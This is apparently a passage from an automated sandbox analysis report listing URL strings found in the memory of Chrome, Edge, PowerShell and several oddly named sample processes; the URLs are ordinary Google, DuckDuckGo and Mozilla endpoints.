Source: chrome.exe, 00000022.00000003.2345615122.000078C403014000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2334058001.000078C402538000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2350821967.000078C402EA4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2323850790.000078C402538000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2323759782.000078C403014000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318006958.000078C402688000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2334096133.000078C4034BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2322578104.000078C403014000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2319279161.000078C403014000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstoreLDDiscover
Source: chrome.exe, 00000022.00000002.2516238586.00006F8C00920000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymity-pa.googleapis.com/
Source: chrome.exe, 00000022.00000003.2306667952.00006F8C00728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2306481564.00006F8C0071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2516465849.00006F8C00974000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
Source: chrome.exe, 00000022.00000002.2516238586.00006F8C00920000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/
Source: chrome.exe, 00000022.00000003.2306667952.00006F8C00728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2306481564.00006F8C0071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2516465849.00006F8C00974000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
Source: chrome.exe, 00000022.00000002.2516238586.00006F8C00920000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/KAnonymityServiceJoinRelayServerhttps://chromekanonym
Source: chrome.exe, 00000022.00000002.2516238586.00006F8C00920000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
Source: chrome.exe, 00000022.00000003.2306667952.00006F8C00728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2306481564.00006F8C0071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2516465849.00006F8C00974000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
Source: chrome.exe, 00000022.00000002.2530312833.000078C403090000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromium-i18n.appspot.com/ssl-aggregate-address/
Source: chrome.exe, 00000022.00000002.2520084095.000078C4023C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://classroom.googleapis.com/
Source: chrome.exe, 00000022.00000002.2520084095.000078C4023C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://classroom.googleapis.com/g
Source: chrome.exe, 00000022.00000003.2302432395.000067DC002D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2302492596.000067DC002E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/cr/report
Source: chrome.exe, 00000022.00000002.2524108763.000078C402995000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2523367922.000078C402884000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2313245762.000078C4026B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2527742967.000078C402E3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2518049276.000078C40221C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2520187574.000078C40240C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000041.00000002.2560644232.0000693C02240000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: chrome.exe, 00000022.00000002.2525308278.000078C402B64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collection-images?rt=b
Source: chrome.exe, 00000022.00000002.2525308278.000078C402B64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collection-images?rt=bx
Source: chrome.exe, 00000022.00000002.2525308278.000078C402B64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collections?rt=b
Source: chrome.exe, 00000022.00000002.2524108763.000078C402988000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=b
Source: chrome.exe, 00000022.00000002.2520084095.000078C4023C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients4.google.com/chrome-sync
Source: chrome.exe, 00000022.00000002.2520084095.000078C4023C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients4.google.com/chrome-sync/event
Source: chrome.exe, 00000022.00000002.2523168058.000078C40281C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=117
Source: jROrnzx.exe, 00000012.00000002.2329211901.000000000115C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.moz
Source: qFqSpAp.exe, 0000000E.00000003.2118407844.0000000003FF4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: qFqSpAp.exe, 0000000E.00000003.2118407844.0000000003FF4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: powershell.exe, 00000020.00000002.2377073806.0000000005D61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003E.00000002.2687444169.0000000005D99000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000020.00000002.2377073806.0000000005D61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003E.00000002.2687444169.0000000005D99000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000020.00000002.2377073806.0000000005D61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003E.00000002.2687444169.0000000005D99000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: chrome.exe, 00000022.00000003.2329293699.000078C402498000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/368855.)
Source: chrome.exe, 00000022.00000002.2526325169.000078C402C8C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/report-to/gws/none
Source: chrome.exe, 00000022.00000002.2520891889.000078C40250C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.goog
Source: chrome.exe, 00000022.00000002.2520891889.000078C40250C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.googl0
Source: chrome.exe, 00000022.00000003.2313245762.000078C4026B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/
Source: chrome.exe, 00000022.00000002.2536716160.000078C403510000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/
Source: chrome.exe, 00000022.00000003.2313802107.000078C4028D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2523590244.000078C4028E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2533724179.000078C403238000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/:
Source: chrome.exe, 00000022.00000003.2313802107.000078C4028D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2533807028.000078C4032D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2536277147.000078C403384000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2523590244.000078C4028E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2533724179.000078C403238000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2530312833.000078C403090000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/?usp=installed_webapp
Source: chrome.exe, 00000022.00000003.2313802107.000078C4028D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2523590244.000078C4028E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2533724179.000078C403238000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/J
Source: chrome.exe, 00000022.00000002.2536716160.000078C403510000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/doglx
Source: chrome.exe, 00000022.00000003.2313802107.000078C4028D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2524108763.000078C402988000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2523590244.000078C4028E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2533724179.000078C403238000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default
Source: chrome.exe, 00000022.00000002.2524108763.000078C402988000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_defaultlt
Source: chrome.exe, 00000022.00000002.2536716160.000078C403510000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/njb
Source: chrome.exe, 00000022.00000002.2524575070.000078C402A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2524271591.000078C4029A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2527837520.000078C402E5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2522078107.000078C4026E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000022.00000002.2524575070.000078C402A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2524271591.000078C4029A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2530312833.000078C403090000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2522078107.000078C4026E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000022.00000002.2524575070.000078C402A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2524271591.000078C4029A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2530312833.000078C403090000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2522078107.000078C4026E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actionsy
Source: chrome.exe, 00000022.00000002.2536716160.000078C403510000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/
Source: chrome.exe, 00000022.00000003.2313802107.000078C4028D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2523590244.000078C4028E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2533724179.000078C403238000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/:
Source: chrome.exe, 00000022.00000003.2313802107.000078C4028D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2521090295.000078C40256C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2533807028.000078C4032D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2523590244.000078C4028E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2533724179.000078C403238000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapp
Source: chrome.exe, 00000022.00000003.2313802107.000078C4028D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2523590244.000078C4028E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2533724179.000078C403238000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/J
Source: chrome.exe, 00000022.00000002.2523168058.000078C40281C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_default
Source: chrome.exe, 00000022.00000002.2536716160.000078C403510000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/oglx
Source: chrome.exe, 00000022.00000002.2524108763.000078C402988000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2533414027.000078C4031DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2522577631.000078C40271C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000022.00000002.2536716160.000078C403510000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/x
Source: chrome.exe, 00000022.00000002.2536402148.000078C4033AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2528619926.000078C402F60000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/
Source: chrome.exe, 00000022.00000003.2313802107.000078C4028D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2523590244.000078C4028E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/:
Source: chrome.exe, 00000022.00000003.2313802107.000078C4028D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2533807028.000078C4032D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2523125641.000078C40280C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2523590244.000078C4028E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webapp
Source: chrome.exe, 00000022.00000003.2313802107.000078C4028D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2523590244.000078C4028E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/J
Source: chrome.exe, 00000022.00000002.2526325169.000078C402C8C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default
Source: chrome.exe, 00000022.00000002.2536402148.000078C4033AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/oglx
Source: chrome.exe, 00000022.00000002.2524108763.000078C402988000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2533414027.000078C4031DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2522577631.000078C40271C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000022.00000003.2313245762.000078C4026B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-autopush.corp.google.com/
Source: chrome.exe, 00000022.00000003.2313245762.000078C4026B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-0.corp.google.com/
Source: chrome.exe, 00000022.00000003.2313245762.000078C4026B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-1.corp.google.com/
Source: chrome.exe, 00000022.00000002.2520891889.000078C40250C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-2.corp
Source: chrome.exe, 00000022.00000003.2313245762.000078C4026B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-2.corp.google.com/
Source: chrome.exe, 00000022.00000002.2520891889.000078C40250C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-3.corp.googl
Source: chrome.exe, 00000022.00000003.2313245762.000078C4026B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-3.corp.google.com/
Source: chrome.exe, 00000022.00000002.2520891889.000078C40250C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-4.c
Source: chrome.exe, 00000022.00000003.2313245762.000078C4026B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-4.corp.google.com/
Source: chrome.exe, 00000022.00000002.2520891889.000078C40250C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-5.corp.go
Source: chrome.exe, 00000022.00000003.2313245762.000078C4026B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-5.corp.google.com/
Source: chrome.exe, 00000022.00000003.2313245762.000078C4026B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-6.corp.google.com/
Source: chrome.exe, 00000022.00000003.2313245762.000078C4026B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-preprod.corp.google.com/
Source: chrome.exe, 00000022.00000003.2313245762.000078C4026B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-staging.corp.google.com/
Source: chrome.exe, 00000022.00000003.2333066892.000078C4025A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-thirdparty.googleusercontent.com/32/type/
Source: chrome.exe, 00000022.00000003.2313245762.000078C4026B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: chrome.exe, 00000022.00000003.2313802107.000078C4028D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2527742967.000078C402E3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2523590244.000078C4028E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/:
Source: chrome.exe, 00000022.00000002.2536402148.000078C4033AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2313802107.000078C4028D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2527742967.000078C402E3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2523590244.000078C4028E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2529190410.000078C402FD0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/?lfhs=2
Source: chrome.exe, 00000022.00000002.2536402148.000078C4033AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/?lfhs=2ation.Result
Source: chrome.exe, 00000022.00000002.2536402148.000078C4033AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/?lfhs=2d
Source: chrome.exe, 00000022.00000003.2313802107.000078C4028D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2527742967.000078C402E3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2523590244.000078C4028E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/J
Source: chrome.exe, 00000022.00000003.2313802107.000078C4028D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2536277147.000078C403384000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2527742967.000078C402E3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2523590244.000078C4028E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_default
Source: chrome.exe, 00000022.00000002.2527742967.000078C402E3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2525409166.000078C402BB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/?q=
Source: qFqSpAp.exe, 0000000E.00000003.2069781454.0000000003F98000.00000004.00000800.00020000.00000000.sdmp, qFqSpAp.exe, 0000000E.00000003.2069870204.0000000003F95000.00000004.00000800.00020000.00000000.sdmp, qFqSpAp.exe, 0000000E.00000003.2069969508.0000000003F95000.00000004.00000800.00020000.00000000.sdmp, 7aencsM.exe, 00000018.00000002.2820097256.0000000003E28000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2323606864.000078C402E2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2527698275.000078C402E2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2318117825.000078C402E2C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: qFqSpAp.exe, 0000000E.00000003.2069781454.0000000003F98000.00000004.00000800.00020000.00000000.sdmp, qFqSpAp.exe, 0000000E.00000003.2069870204.0000000003F95000.00000004.00000800.00020000.00000000.sdmp, qFqSpAp.exe, 0000000E.00000003.2069969508.0000000003F95000.00000004.00000800.00020000.00000000.sdmp, 7aencsM.exe, 00000018.00000002.2820097256.0000000003E28000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2527742967.000078C402E3C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: chrome.exe, 00000022.00000002.2527742967.000078C402E3C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.ico
Source: qFqSpAp.exe, 0000000E.00000003.2069781454.0000000003F98000.00000004.00000800.00020000.00000000.sdmp, qFqSpAp.exe, 0000000E.00000003.2069870204.0000000003F95000.00000004.00000800.00020000.00000000.sdmp, qFqSpAp.exe, 0000000E.00000003.2069969508.0000000003F95000.00000004.00000800.00020000.00000000.sdmp, 7aencsM.exe, 00000018.00000002.2820097256.0000000003E28000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: skotes.exe, 00000004.00000002.2841402465.0000000005BD6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.com/css2?family=Nunito&display=swap
Source: skotes.exe, 00000004.00000003.2227193904.0000000005BB6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fonts.goots.goo2
Source: skotes.exe, 00000004.00000003.2227193904.0000000005BB6000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000004.00000002.2841402465.0000000005BD6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fonts.gstatic.com
Source: powershell.exe, 00000020.00000002.2357011977.0000000004E56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2391431068.0000000007410000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000003E.00000002.2595388076.0000000004E81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000020.00000002.2357011977.0000000005099000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003E.00000002.2595388076.0000000005336000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: chrome.exe, 00000022.00000002.2516238586.00006F8C00920000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/
Source: chrome.exe, 00000022.00000003.2306667952.00006F8C00728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2306481564.00006F8C0071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2516465849.00006F8C00974000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
Source: chrome.exe, 00000022.00000002.2516238586.00006F8C00920000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
Source: chrome.exe, 00000022.00000003.2306667952.00006F8C00728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2306481564.00006F8C0071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2516465849.00006F8C00974000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
Source: chrome.exe, 00000022.00000002.2516238586.00006F8C00920000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/
Source: chrome.exe, 00000022.00000003.2306667952.00006F8C00728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2306481564.00006F8C0071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2516465849.00006F8C00974000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/bJ
Source: chrome.exe, 00000022.00000002.2517995369.000078C40220C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2520084095.000078C4023C4000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000041.00000002.2564990269.0000693C025A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google.com/
Source: chrome.exe, 00000022.00000002.2520084095.000078C4023C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google.com/googleapis.com
Source: chrome.exe, 00000022.00000002.2523168058.000078C40281C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://googleusercontent.com/
Source: qFqSpAp.exe, 0000000E.00000003.2118407844.0000000003FF4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqd4plX4pbW1CbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: chrome.exe, 00000022.00000003.2318365053.000078C402D24000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000041.00000003.2478378515.0000693C0257C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/161903006
Source: chrome.exe, 00000022.00000003.2318365053.000078C402D24000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000041.00000003.2478378515.0000693C0257C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/166809097
Source: chrome.exe, 00000022.00000003.2318365053.000078C402D24000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000041.00000003.2478378515.0000693C0257C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/184850002
Source: chrome.exe, 00000022.00000003.2318365053.000078C402D24000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000041.00000003.2478378515.0000693C0257C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/187425444
Source: chrome.exe, 00000022.00000003.2318365053.000078C402D24000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000041.00000003.2478378515.0000693C0257C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/220069903
Source: chrome.exe, 00000022.00000003.2318365053.000078C402D24000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000041.00000003.2478378515.0000693C0257C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/229267970
Source: chrome.exe, 00000022.00000003.2318365053.000078C402D24000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000041.00000003.2478378515.0000693C0257C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/250706693
Source: chrome.exe, 00000022.00000003.2318365053.000078C402D24000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000041.00000003.2478378515.0000693C0257C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/253522366
Source: chrome.exe, 00000022.00000003.2318365053.000078C402D24000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000041.00000003.2478378515.0000693C0257C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/255411748
Source: chrome.exe, 00000022.00000003.2318365053.000078C402D24000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000041.00000003.2478378515.0000693C0257C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/258207403
Source: chrome.exe, 00000022.00000003.2318365053.000078C402D24000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000041.00000003.2478378515.0000693C0257C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/274859104
Source: chrome.exe, 00000022.00000003.2318365053.000078C402D24000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000041.00000003.2478378515.0000693C0257C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/284462263
